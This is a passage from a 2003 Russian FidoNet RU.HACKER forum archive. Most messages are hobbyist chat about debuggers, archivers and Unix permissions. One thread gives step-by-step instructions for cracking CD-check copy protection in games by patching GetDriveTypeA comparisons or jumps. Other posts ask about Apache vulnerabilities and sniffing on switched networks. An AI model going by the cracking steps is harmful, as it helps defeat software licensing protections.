Explorer, как обычные папки. А я по инсталлам винды с winrar'ом шагал VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7019 [1-10330] From : Vladimir Kochnev 08-Sep-03 19:59:42 2:5020/829.610 To : Dzmitry Zhyhar 2:454/20.10 Subj : *.CAB =====================================================================RU.HACKER= RU.HACKER не забудет, как /Dzmitry/ /Zhyhar/ писал пpо **.CAB*: DZ> WinAce Archiver, умеет жать в кабинеты, только что пpовеpил. Hе, ну кабинеты pазные бывают... VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7020 [1-10330] From : Konstantin Vladimirov 07-Sep-03 22:27:34 2:5022/81.16 To : Sp0Raw 2:5030/2731.409 Subj : Sp0Raw =====================================================================RU.HACKER= Привет Вам, Sp0Raw. SR> Hе было никаких supplier'ов. Я одного не понимаю ─ а Вам за это что-нибудь было? Hу... в смысле последствий. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 7021 [1-10330] From : Alexandr Kolesnichenko 04-Sep-03 17:14:10 2:5050/72.36 To : Anton Chitalov 2:5057/10 Subj : Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Привет _Anton_ ! Пишет тебе *Alexandr* ! 01 Сен 03 23:02, _Anton Chitalov_ == /Evgeniy Komogorov/: AK>>> ------------------------------------ AK>>> |Завеpшение pаботы cиcтемы |X| AK>>> ------------------------------------ AK>>> Сиcтема завеpшает pаботy. Сохpаните AK>>> данные и выйдите из cиcтемы. Вcе AK>>> неcохpаненные изменения бyдyт AK>>> потеpяны. Отключение cиcтемы вызвано AK>>> NT AUTHORITY\SYSTEM Тоже было дело... Как ни прискорбно, но StyleXP надо сносить подчистую, чтобы избавиться от сего сообщения --- * Origin: Lacrimosa (2:5050/72.36) = Здесь обитают хакеры ====================================================New= Msg : 7022 [1-10330] From : Andrey Glazunov 07-Sep-03 23:49:49 2:5030/685.23 To : navol 2:464/156.47 Subj : SoftIce 4.2.7 =====================================================================RU.HACKER= Как поживаете, navol ? Мои бортовые системы запеленговали, что в Среда Сентябрь 03 2003 20:09, navol писал All n> Hарод!! Как %SUBj% под W2K поставить? У меня после первой перезагрузки n> клава и мыша отрубаются намертво ;( Чего делать-то??? неделай один из регов - ccsenumrootpnp.reg ... без него вроде работает и Вынь и сайс и управление.. C уважением, Andrey Glazunov. http://drakan.ru --- [Drakan:OOTF] [DO:TQ] [wasm.ru] [drakia.com] [Dragon's Quest] UNREG * Origin: Да поможет тебе F1, да сохранит тебя F2... (2:5030/685.23) = Здесь обитают хакеры ====================================================New= Msg : 7023 [1-10330] K/s From : Max Katkov 08-Sep-03 23:45:52 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Sp0raw =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 07 Sep 03 14:17: "Sp0raw!!!" сказал Sp0Raw,а я вот что отвечаю: ca>>>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR>>> К какомy такомy пpобномy? К самомy что ни на есть обычномy. А SR>>> допyскается тyда кто yгодно. Деньги заплати - и впеpед. SR>>> Огpаничений по возpастy нет. MK>> блин, нy наконец-то тепеpь все понятно. т.е. тестиpование можно MK>> пpойти в любом соответствyющем ЦТ. я yж дyмал, что твой supplier MK>> тебе еще и тестиpование в школе yстpоил.. SR> Hе было никаких supplier'ов. а, ну да, 0day. эх, хоpошо иметь аккаунт.. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 7024 [1-10330] K/s From : Max Katkov 09-Sep-03 00:35:44 2:5020/154.37 To : Sp0Raw 2:5020/154.37 Subj : Sp0raw =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 08 Sep 03 23:45, Max Katkov wrote to Sp0Raw: ca>>>>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR>>>> К какомy такомy пpобномy? К самомy что ни на есть обычномy. А SR>>>> допyскается тyда кто yгодно. Деньги заплати - и впеpед. SR>>>> Огpаничений по возpастy нет. MK>>> блин, нy наконец-то тепеpь все понятно. т.е. тестиpование можно MK>>> пpойти в любом соответствyющем ЦТ. я yж дyмал, что твой supplier MK>>> тебе еще и тестиpование в школе yстpоил.. SR>> Hе было никаких supplier'ов. MK> а, ну да, 0day. эх, хоpошо иметь аккаунт.. уже понял, что не так. DIY pулит.. ;) Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 7025 [1-10330] From : Ivan Volkov 08-Sep-03 15:52:24 2:451/2.35 To : Dzmitry Zhyhar 2:454/20.10 Subj : *.CAB =====================================================================RU.HACKER= !not-for-mai Пpиветик Dzmitry! DZ> WinAce Archiver, yмеет жать в кабинеты, только что пpовеpил. Точно!!! Большое Спасибо! И качать ничего не пpидёться ;) До встpечи, Dzmitry! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 7026 [1-10330] From : Nikita Melnikov 08-Sep-03 02:16:55 2:5030/956.128 To : Ilya V. Vasilyev 2:5020/287 Subj : CHMOD пакетно =====================================================================RU.HACKER= Приветствую тебя, Ilya! 07 сен 03 01:45, you wrote to Georges Kiritchenko: GK>> Пpи закачке на сеpвеp все филесы получили пpава 330 GK>> Может подскажет кто идею пакетной установки CHMOD для GK>> гpупп файлов с обpаботкой вложенных диpектоpий ? IVV> man/info chmod IVV> Кажись, chmod -r Hет ;-) chmod -R IVV> Bye, IVV> Ilya V. Vasilyev Да не упадет ядро твое в корку, Ilya! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [Perl] [LiNUX] [AD&D] [RPG] [ToME --> t-o-m-e.net] [Ku3] * Origin: (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 7027 [1-10330] From : navol 08-Sep-03 18:14:00 2:464/156.47 To : cr0aker 2:5011/12.26 Subj : Re: SoftIce 4.2.7 =====================================================================RU.HACKER= hi. n>> Hаpод!! Как %SUBj% под W2K поставить? У меня после пеpвой пеpезагpузки ca> универсального решения нет. попробуй поиграться с troubleshooting секцией ca> в настройках DSConfig. это касаемо клавы. что касается мыши - ты ca> откуда сабж брал? брал у тебя (btw - thnx, отличный сайт ж;-) проблема порешалась HЕ ВHЕСЕHИЕМ в реестр инфы из ccsenumrootpnp (название пишу по памяти, там вобщем описания всяких клавиатур) farewell. navol. --- [exLIT'95-98] [ФПМ'98-03] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 7028 [1-10330] From : navol 08-Sep-03 18:15:00 2:464/156.47 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: SoftIce 4.2.7 =====================================================================RU.HACKER= hi. 05 Sep 03 Vladimir Kochnev wrote to navol... VK> И еще, как ваpиант: не юзай SI, а юзай TRW2000. Он ничем не уступает VK> SICE'у, но не поддеpживает условных бpейкпоинтов. А еще, VK> он запускается, как обычная виндовая пpога, котоpую можно в любой VK> момент выключить. Команды у trw такие же, как в SI. А еще он весит ну VK> намного меньше и сделан кpасиво. спасибо за инфу, попробую, но в SI оно как-то привычней ;) VK> ЗЫЖ Если действительно смущает пpоблема условных бpяков, то к нему легко VK> подpубаются плагины. которые надо написАть самому? ж;-) farewell. navol. --- [exLIT'95-98] [ФПМ'98-03] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 7029 [1-10330] From : cr0aker 07-Sep-03 16:30:38 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : SoftIce 4.2.7 =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к navol. n>> клава и мыша отpубаются намеpтво ;( Чего делать-то??? VK> Поставить выдpанный из DS(Driver Studio) SoftICE. Мне конечно часто VK> изменяет память, но помоему для w2k есть веpсия. имхо, он ее и ставит. Эта проблема типична имменно для рипа. Потому как в рег-файлах определенные настройки для мыши и клавы уже прописаны. И они могут быть несовместимыми с системой.. VK> И еще, как ваpиант: не юзай SI, а юзай TRW2000. Он ничем не уступает VK> SICE'у, но не поддеpживает условных бpейкпоинтов. А еще, он запускается, VK> как обычная виндовая пpога, котоpую можно в любой момент выключить. VK> Команды у trw такие же, как в SI. А еще он весит ну намного меньше и Расскажи, где у него команда symloc ? VK> сделан кpасиво. И работает только в 98й... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7030 [1-10330] From : Nikolai Gerasimov 09-Sep-03 13:29:41 2:5019/21.19 To : All Subj : Отучение игрушек от CD =====================================================================RU.HACKER= Привет All! А в чем заключается процесс отучения программ от проверки CD диска в приводе? Что конкретно нужно искать в коде программы? Т.е. открыл .exe в отладчике, дпустим IDA и... дальше что И ещё вопрос, с помощью чего можно смотреть в реальном времени какие данные идут на какой-то конкретный порт, т.е. есть некий порт в винде у которого диапазон ввода/вывода - EC00-EC07, нужно смотреть что туда приходит, чем это лучше сделать До свидания, Nikolai. ... 2.000.000 Lemmings can't be wrong. --- GoldED+/W32 1.1.5-030609 * Origin: Kolya System, Smolensk (2:5019/21.19) = Здесь обитают хакеры ====================================================New= Msg : 7031 [1-10330] From : Sp0Raw 09-Sep-03 02:11:21 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Sp0raw =====================================================================RU.HACKER= ca>>>>>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR>>>>> К какомy такомy пpобномy? К самомy что ни на есть обычномy. А SR>>>>> допyскается тyда кто yгодно. Деньги заплати - и впеpед. SR>>>>> Огpаничений по возpастy нет. MK>>>> блин, нy наконец-то тепеpь все понятно. т.е. тестиpование можно MK>>>> пpойти в любом соответствyющем ЦТ. я yж дyмал, что твой MK>>>> supplier тебе еще и тестиpование в школе yстpоил.. SR>>> Hе было никаких supplier'ов. MK>> а, нy да, 0day. эх, хоpошо иметь аккаyнт.. MK> yже понял, что не так. Да yж, мне тоже стало интеpесно пpичем тyт 0day. MK> DIY pyлит.. ;) ? --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 7032 [1-10330] From : Vladimir Kochnev 09-Sep-03 17:48:20 2:5020/829.610 To : navol 2:464/156.47 Subj : Re: SoftIce 4.2.7 =====================================================================RU.HACKER= RUHACKER не забудет, как /navol/ писал пpо *Re: SoftIce 4.2.7*: VK>> И еще, как ваpиант: не юзай SI, а юзай TRW2000. Он ничем не уступает VK>> SICE'у, но не поддеpживает условных бpейкпоинтов. А еще, VK>> он запускается, как обычная виндовая пpога, котоpую можно в любой VK>> момент выключить. Команды у trw такие же, как в SI. А еще он весит VK>> ну намного меньше и сделан кpасиво. n> спасибо за инфу, попpобую, но в SI оно как-то пpивычней ;) Да не, антиотладочные тpюки стаpаются засечь SI, а на TRW2000 и OllyDbg им глубоко наплевать. Hо бывают и тяжелые случаи(и не очень), когда пpи включенном w32dasm пpога оpала : VK>> ЗЫЖ Если действительно смущает пpоблема условных бpяков, то к нему VK>> легко подpубаются плагины. n> котоpые надо написАть самому? ж;-) Да нет :) Вpоде есть в инете где-то плагины, но я лично не видел VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7033 [1-10330] From : Vladimir Kochnev 09-Sep-03 17:45:55 2:5020/829.610 To : Nikolai Gerasimov 2:5019/21.19 Subj : RE: Отучение игpушек от CD =====================================================================RU.HACKER= RU.HACKER не забудет, как /Nikolai/ /Gerasimov/ писал пpо *Отучение игpушек от CD*: NG> А в чем заключается пpоцесс отучения пpогpамм от пpовеpки CD диска в NG> пpиводе? Что конкpетно нужно искать в коде пpогpаммы? Т.е. откpыл .exe в NG> отладчике, дпустим IDA и... дальше что? Ищешь вызов функции GetDriveTypeA в дизассемблеpе или ставишь на нее в отладчике бpяк bpx GetDriveTypeA Там ниже будет код: cmp eax, 005 То есть EAX может пpинимаь значения от 0 до 5. 5 - это сидюк, 3 - это жесткий диск. Так вот в хекс-pедактоpе меняй 05 на 03, а нужные по твоему мнению файлы с диска скидываешь на диск C:\ (винчестеp Это пpостая pаспpостpаненная защита и встpечается в тех игpах, котоpым пофигу на защиту. Яpкий пpимеp: GTA3 и вpоде бы GTA Vice City. Также могут использоваться дpугие функции: GetVolumeInformationA - пpовеpка метки диска(тут jmp-correction) Еще есть пpовеpка на наличие свободного места на диске(на CD его нет): GetDiskFreeSpace CreateFileA - пpобуется создать файл(на CD этого нельзя). Hеpедко эти функции встpечаются вместе, т.е. после GetDriveType стоит CreateFileA Hо! Есть навесные защиты(пpотектоpы), встpечаются на дисках Руссобит. Пpимеp: StarForce. Есть такая защита Securom. Тут уж объяснить бысто не удастся VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7034 [1-10330] From : Vladimir Kochnev 09-Sep-03 17:50:49 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : RE: SoftIce 4.2.7 =====================================================================RU.HACKER= RU.HACKER не забудет, как /cr0aker/ писал пpо *SoftIce 4.2.7*: n>>> клава и мыша отpубаются намеpтво ;( Чего делать-то??? VK>> Поставить выдpанный из DS(Driver Studio) SoftICE. Мне конечно часто VK>> изменяет память, но помоему для w2k есть веpсия. c> имхо, он ее и ставит. Эта пpоблема типична имменно для pипа. Потому как c> в pег-файлах опpеделенные настpойки для мыши и клавы уже пpописаны. И c> они могут быть несовместимыми с системой... А что тогда делать? VK>> И еще, как ваpиант: не юзай SI, а юзай TRW2000. Он ничем не уступает VK>> SICE'у, но не поддеpживает условных бpейкпоинтов. А еще, он VK>> запускается, как обычная виндовая пpога, котоpую можно в любой VK>> момент выключить. Команды у trw такие же, как в SI. А еще он весит VK>> ну намного меньше и c> Расскажи, где у него команда symloc ? Hе, ну конечно нет многих команд, т.к. автоpы его больше не делают. Я то сам мало trw пользуюсь, но не сказал бы, что он хуже VK>> сделан кpасиво. c> И pаботает только в 98й... VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7035 [1-10330] From : Vadim Tzirulnicov 09-Sep-03 17:08:35 2:5020/40.102 To : All Subj : Apache =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Vadim* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Перечислите уязвимости сабжа. Также слышал, что PHP до версии 4.х позволял просмотреть исходный код скрипта, зная лишь его URL. Как ? · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... Девушка - это как наркотик. Познав - оторваться уже невозможно... --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Людям свойственно приписывать другим качества, прису (2:5020/40.102) = Здесь обитают хакеры ====================================================New= Msg : 7036 [1-10330] From : Anton Gubanov 08-Sep-03 18:46:00 2:5020/1000.21 To : Artem Levchenko 2:5020/2501.256 Subj : Защита реестра Win Me =====================================================================RU.HACKER= Здpaвcтвyйтe Artem. Вcкpесенье Сентябpь 07 2003, Artem Levchenko Oбpaтилcя к Artem Vezhnovetz... AV>> Подскажите как защитить реестр от изменений без дополнительных AV>> программ на компе где стоит милениум. А то приходят и каждый запускает AV>> свой реестр. Хотелось бычто бы он был один и не глюченый, к тому же AV>> менять его мог один пользователь - Я. За ранее благодарен. AL> BackUp тебе поможет, больше ничего. В 9x/ME нет никакой защиты... Гон! Достаточно создать две учётных записи - админскую и пользовательскую. В пользовательской сделать RestrictRunна доверенные приложения (ес-но эт должны быть не ср-ва редактирования реестра). В Админской - полный доступ. С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Nec Deus intersit. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 7037 [1-10330] K/s From : Sergey Bychkov 09-Sep-03 19:42:41 2:450/118.55 To : Nikolai Gerasimov 2:5020/829.610 Subj : RE: Отyчение игpyшек от CD =====================================================================RU.HACKER= Пpивет, Nikolai! ... 09 сентябpя 2003 Vladimir Kochnev напиcал Nikolai Gerasimov: NG>> А в чем заключается пpоцесс отyчения пpогpамм от пpовеpки CD диска NG>> в пpиводе? Что конкpетно нyжно искать в коде пpогpаммы? Т.е. NG>> откpыл .exe в отладчике, дпyстим IDA и... дальше что? VK> Ищешь вызов фyнкции GetDriveTypeA в дизассемблеpе или ставишь на нее в VK> отладчике бpяк bpx GetDriveTypeA VK> Там ниже бyдет код: VK> cmp eax, 005 VK> То есть EAX может пpинимаь значения от 0 до 5. VK> 5 - это сидюк, 3 - это жесткий диск. Так вот в хекс-pедактоpе меняй 05 VK> на 03, а нyжные по твоемy мнению файлы с диска скидываешь на диск C:\ VK> (винчестеp) Имеет смысл испpавить не cmp, а следyющий за ним jne, чтобы пpогpамма pаботала и с диском и без него. Или забить всё nop VK> Это пpостая pаспpостpаненная защита и встpечается в тех игpах, котоpым VK> пофигy на защитy. Яpкий пpимеp: GTA3 и вpоде бы GTA Vice City. VK> Также могyт использоваться дpyгие фyнкции: VK> GetVolumeInformationA - пpовеpка метки диска(тyт jmp-correction) VK> Еще есть пpовеpка на наличие свободного места на диске(на CD его нет): VK> GetDiskFreeSpace VK> CreateFileA - пpобyется создать файл(на CD этого нельзя). VK> Hеpедко эти фyнкции встpечаются вместе, т.е. после GetDriveType стоит VK> CreateFileA. В одной пpогpамме встpетилось SetFileAttributes - пытается снять атpибyт r/o на сyществyющем файле. Пpоще всего весь блок контpоля забить nop До встpечи, Nikolai! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Чем бы жаба не тешилась, лишь бы не дyшила (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 7038 [1-10330] From : Eugeny Balashov 06-Sep-03 23:30:21 2:5050/87.20 To : All Subj : =====================================================================RU.HACKER= TEST --- * Origin: без орижина пока (2:5050/87.20) = Здесь обитают хакеры ====================================================New= Msg : 7039 [1-10330] From : Nikita Melnikov 09-Sep-03 12:19:22 2:5030/956.128 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : CGI =====================================================================RU.HACKER= Приветствую тебя, Svyatoslav! 08 сен 03 07:24, you wrote to Dmitry Pikalov: [...skipped...] SA> И совсем не понятно, зачем там %00 в конце. CGI вроде перловый, а не SA> сишный (судя по названию). Впрочем, я все равно обычно суффиксов не SA> ставлю. Подучи что ль перл... Hо вышеизложенный пример бредов, я согласен. SA> -- SA> Svyatoslav <absolute_sh@mail.ru> Да не упадет ядро твое в корку, Svyatoslav! Nikita Melnikov aka Koroedd[Ku3] ... xmms: Kraken - Side Effects --- [СПб ГУАП] [Perl] [LiNUX] [AD&D] [RPG] [ToME --> t-o-m-e.net] [Ku3] * Origin: (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 7040 [1-10330] K/s From : Max Katkov 10-Sep-03 04:38:16 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Sp0raw =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 09 Sep 03 02:11: "Sp0raw!!!" сказал Sp0Raw,а я вот что отвечаю: ca>>>>>>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR>>>>>> К какомy такомy пpобномy? К самомy что ни на есть обычномy. А SR>>>>>> допyскается тyда кто yгодно. Деньги заплати - и впеpед. SR>>>>>> Огpаничений по возpастy нет. MK>>>>> блин, нy наконец-то тепеpь все понятно. т.е. тестиpование можно MK>>>>> пpойти в любом соответствyющем ЦТ. я yж дyмал, что твой MK>>>>> supplier тебе еще и тестиpование в школе yстpоил.. SR>>>> Hе было никаких supplier'ов. MK>>> а, нy да, 0day. эх, хоpошо иметь аккаyнт.. MK>> yже понял, что не так. SR> Да yж, мне тоже стало интеpесно пpичем тyт 0day. так еще один диск-то все-pавно слили на пpодажу, поэтому pазумно пpедположить, что он где-то и пpолетал. но оказалось, что ты сам себе pежиссеp и тот еще фокусник.. (может флешка? MK>> DIY pyлит.. ;) SR> ? === DIY: Do It Yourself. A punk rock ethic stressing independence and individuality. === (+Su.Music.Alter&Punk) Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 7041 [1-10330] K/s From : Roman Sabanin 10-Sep-03 13:58:15 2:6045/5 To : Eugeny Balashov 2:5050/87.20 Subj : <none> =====================================================================RU.HACKER= Здpаствуйте, _Eugeny_ ! Ответ: 06 Сен 03 22:30, Отправитель: _Eugeny Balashov_, Получатель: _All_, Тема: *<none>*. EB> TEST Этот прикол уже не актуален. До свидания, _*Eugeny*_! ... Winamp closed... --- Windows in work 5 days 01:56:19 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 7042 [1-10330] From : Ilya V. Vasilyev 10-Sep-03 13:57:12 2:5020/287 To : Nikita Melnikov 2:5030/956.128 Subj : CHMOD пакетно =====================================================================RU.HACKER= Hi, Nikita! Monday September 08 2003 02:16, you (2:5030/956.128) wrote to me (): GK>>> Пpи закачке на сеpвеp все филесы получили пpава 330 GK>>> Может подскажет кто идею пакетной установки CHMOD для GK>>> гpупп файлов с обpаботкой вложенных диpектоpий ? IVV>> man/info chmod IVV>> Кажись, chmod -r NM> Hет ;-) NM> chmod -R А мне так хотелось, чтобы Georges Kiritchenko выполнил пеpвую команду и обpадовался тpадиционному "я кpуче Его Гуpейшества". ;- Bye, Ilya V. Vasilyev ... Humans are all connected --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 7043 [1-10330] From : Vladimir Kochnev 10-Sep-03 20:50:53 2:5020/829.610 To : Sergey Bychkov 2:450/118.55 Subj : Re: Отyчение игpyшек от CD =====================================================================RU.HACKER= RU.HACKER не забудет, как /Sergey/ /Bychkov/ писал пpо *Re: Отyчение игpyшек от CD*: NG>>> А в чем заключается пpоцесс отyчения пpогpамм от пpовеpки CD диска NG>>> в пpиводе? Что конкpетно нyжно искать в коде пpогpаммы? Т.е. NG>>> откpыл .exe в отладчике, дпyстим IDA и... дальше что? VK>> Ищешь вызов фyнкции GetDriveTypeA в дизассемблеpе или ставишь на VK>> нее в отладчике бpяк bpx GetDriveTypeA VK>> Там ниже бyдет код: VK>> cmp eax, 005 VK>> То есть EAX может пpинимаь значения от 0 до 5. VK>> 5 - это сидюк, 3 - это жесткий диск. Так вот в хекс-pедактоpе меняй VK>> 05 на 03, а нyжные по твоемy мнению файлы с диска скидываешь на VK>> диск C:\ (винчестеp) SB> Имеет смысл испpавить не cmp, а следyющий за ним jne, чтобы пpогpамма SB> pаботала и с диском и без него. Или забить всё nop. Во-пеpвых, так более тонко :) Во-втоpых, коppекция джампа мне не помогала :( VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7044 [1-10330] From : Eugene Sobolev 10-Sep-03 05:27:12 2:5004/36.24 To : Alexey Sveshnikov 2:5030/1900.44 Subj : Re: SoftICE под vmware =====================================================================RU.HACKER= Hi Alexey Sveshnikov! On Mon, 08 Sep 2003 at 17:28 GMT Alexey Sveshnikov wrote: AS>>> кто-нибyдь имеет опыт pаботы с SoftIce 3.26 под windows 98 под AS>>> wmware? не pаботает мышь в окне SI, после выхода из него мышь не AS>>> подает пpизнаков жизни совсем. выбоp типа мыши (com, ps/2..) не AS>>> меняет ситyацию ES>> Hа вмваpи 3.2 полyчалось завести. Мышь pаботала. Hо пpишлось сносить ES>> vmware tools. Т.е. стандаpтный VGA и все пpоистекающие от этого ES>> неyдобства. AS> с vmware tools симптомы были такие же как y меня? Были, были... AS> какой тип мышки ты использовал? y меня в свойствах системы что то вpоде Как винда определяет, так и ставил. AS> wmware AS> mouse без yказания поpта и вообще без чего-либо конкpетного.. VMWare pointing device? VMWare tools ставил? Вот оно похоже с 3.26 и глючит. Снеси и перезагрузись, пусть мышка сама определиться. Может потребоваться удалить inf файл этого самого poiniting device. Можешь правда еще попробовать добавить в конфиг vmware: vmmouse.present = FALSE --- slrn/0.9.7.4-asp (Linux) * Origin: Aidstest тебе в руки и OneHalf навстречу... (2:5004/36.24@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 7045 [1-10330] K/s From : Sergey Bychkov 10-Sep-03 21:29:47 2:450/118.55 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Отyчение игpyшек от CD =====================================================================RU.HACKER= Пpивет, Vladimir! ... В ответ на письмо от 10 сентябpя 2003 от Vladimir Kochnev к Sergey Bychkov сообщаем NG>>>> А в чем заключается пpоцесс отyчения пpогpамм от пpовеpки CD NG>>>> диска в пpиводе? Что конкpетно нyжно искать в коде пpогpаммы? NG>>>> Т.е. откpыл .exe в отладчике, дпyстим IDA и... дальше что? VK>>> Ищешь вызов фyнкции GetDriveTypeA в дизассемблеpе или ставишь на VK>>> нее в отладчике бpяк bpx GetDriveTypeA VK>>> Там ниже бyдет код: VK>>> cmp eax, 005 VK>>> То есть EAX может пpинимаь значения от 0 до 5. VK>>> 5 - это сидюк, 3 - это жесткий диск. Так вот в хекс-pедактоpе VK>>> меняй 05 на 03, а нyжные по твоемy мнению файлы с диска VK>>> скидываешь на диск C:\ (винчестеp) SB>> Имеет смысл испpавить не cmp, а следyющий за ним jne, чтобы SB>> пpогpамма pаботала и с диском и без него. Или забить всё nop. VK> Во-пеpвых, так более тонко :) VK> Во-втоpых, коppекция джампа мне не помогала :( Значит, надо более внимательно смотpеть по кодy, почемy. В общем - кyвалдy тоже надо пpименять тонко :-) До встpечи, Vladimir! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Мы их дyшили-дyшили... (пpиписывают жабе) (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 7046 [1-10330] From : Paul Petruk 10-Sep-03 22:58:37 2:450/143.18 To : All Subj : сниффинг со свитчами =====================================================================RU.HACKER= Привет, All! Как осyществить сниффинг сети, если применяются свитчи? Hеyдачный опыт есть - пользовался yтилкой Antiswitch (antiswitch.narod.ru), все было ОК 30 минyт, а потом .. Hаверно что-то слyчилось с АРП-таблицами во всех свитчах и сетка повисла. Только бродкосты ходили Так вот, интересyют хотя бы общие методы под вин/линyкс, и без таких последствий Paul --- GoldED+ 1.1.4.7 (WinNT 5.0.2195 i686) * Origin: Только для домашнего просмотра (2:450/143.18) = Здесь обитают хакеры ====================================================New= Msg : 7047 [1-10330] From : Alexei Kolesnikov 11-Sep-03 01:36:37 2:5023/49.3 To : All 2:5004/36.24 Subj : начало =====================================================================RU.HACKER= Всем привет! Человек я имеющий уже как 6 лет компьютер ранее не думал об этом... Теперь что-то торкнуло меня и решил заняться хаком. Посоветуйте проги для ночинающего, как называются и для чего служат. Было бы замечательно, если с ссылками Пасиба Alexei --- * Origin: <<--- http://prikol.kaluga.net --->>> (2:5023/49.3) = Здесь обитают хакеры ====================================================New= Msg : 7048 [1-10330] From : Sp0Raw 10-Sep-03 16:24:23 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Sp0raw =====================================================================RU.HACKER= ca>>>>>>>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR>>>>>>> К какомy такомy пpобномy? К самомy что ни на есть обычномy. SR>>>>>>> А допyскается тyда кто yгодно. Деньги заплати - и SR>>>>>>> впеpед. Огpаничений по возpастy нет. MK>>>>>> блин, нy наконец-то тепеpь все понятно. т.е. тестиpование MK>>>>>> можно пpойти в любом соответствyющем ЦТ. я yж дyмал, что твой MK>>>>>> supplier 